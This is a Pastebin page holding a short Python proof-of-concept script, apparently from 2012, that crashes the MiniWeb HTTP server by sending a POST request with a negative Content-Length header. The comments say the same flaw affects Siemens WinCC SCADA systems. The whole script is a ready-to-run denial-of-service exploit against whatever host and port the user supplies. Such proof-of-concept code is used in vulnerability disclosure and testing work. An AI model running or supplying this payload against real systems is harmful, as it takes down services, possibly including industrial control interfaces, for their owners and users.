SHARE
TWEET

MiniWeb Content-Length DoS PoC Exploit

infodox May 31st, 2012 302 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. # miniweb Content-Length DoS PoC
  3. # Not a 0day, sadly.
  4. # aluigi found this ages back, I independantly rediscovered it fuzzing
  5. # and noticed it was still unpatched. Oh well, better disclose so!
  6. # vuln version at code.google.com/p/miniweb/
  7. # affects WinCC also :) (Oh, them SCADA...)
  8. # Massive props to ohdae for helping with this!
  9. # insecurety.net | bindshell.it.cx
  10. import sys
  11. import socket
  12.  
  13. def banner():
  14.     print """
  15. MiniWeb Killer - Kills MiniWeb
  16. -Insecurety Research
  17. -Bindshell Labs
  18. """
  19.  
  20. if len(sys.argv) != 3:
  21.     banner()
  22.     print "Usage: ./MiniDoS.py <host> <port>"
  23.     sys.exit(1)
  24.  
  25. banner()
  26. target = sys.argv[1]
  27. port = sys.argv[2]
  28.  
  29. evil = "POST / HTTP/1.1\r\n"
  30. evil += "Host: %s\r\n" %(target)
  31. evil += "User-Agent: MiniWeb Killer ^-^\r\n"
  32. evil += "Content-Length: -10 \r\n\r\n" # part that kills the box
  33. expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
  34. try:
  35.     expl.connect((target, int(port)))
  36.     print "[+] Connected, firing das payload!"
  37. except:
  38.     print "[-] Connection Failed... Is there even a target?"
  39.     sys.exit(1)
  40. try:
  41.     expl.send(evil)
  42.     print "[+] Payload Sent!"
  43. except:
  44.     print "[-] Payload Sending Failure... WTF?"
  45.     sys.exit(1)
  46. expl.close()
  47. print "[*] Should be dead..."
RAW Paste Data
Top